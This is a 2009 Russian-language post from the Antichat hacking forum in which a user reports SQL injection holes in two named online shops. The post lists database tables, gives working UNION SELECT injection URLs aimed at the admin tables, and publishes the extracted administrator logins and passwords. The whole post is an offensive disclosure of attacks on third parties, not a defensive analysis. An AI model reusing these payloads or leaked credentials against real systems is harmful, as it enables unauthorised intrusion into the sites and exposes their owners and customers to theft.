HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.03.2009, 12:35
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

Интернет магазин

saktalingchan.com PR=5


Database saktalin_shop
Таблицы:
Код:
CJ_UsersOnline
true_admin  
true_boardans 
true_boardque 
true_boardworld 
true_config  
true_confirm  
true_content 
true_contentcat 
true_contentsub 
true_gallery  
true_gallerycat  
true_help 
true_help2  
true_items  
true_links  
true_product 
true_productcategory 
true_productcategorysub 
true_proname 
true_sale 
true_ticket

Код:
http://www.saktalingchan.com/product.php?catid=1&catsubid=3&id=171+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3,id,user,pass ),10,11,12,13,14,15,16,17,18,19,20+from+true_admin--
С выводом пароля че-то втыкал долго не думал что pass

2 админа
login:saktalingchan pass:8687222
login:trueamulet pass:jwebmaster



Админку не нашел правда я её и не особо искал




grandlite.co.th


Database grandlit_db
Table:
Код:
grandliteadmin 
prdadep  
prdbcat 
prdcprd

Сайт ваще весь дырявый как друшлак

Код:
http://www.grandlite.co.th/onproduct.php?id=277+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin+limit+1,1--

Код:
http://www.grandlite.co.th/product.php?depid=9+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin--
Админку не нашёл и тут. Все что удалось узнать это pass=password а логин скоре всего admin.

Последний раз редактировалось S0ulVortex; 01.03.2009 в 12:55..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.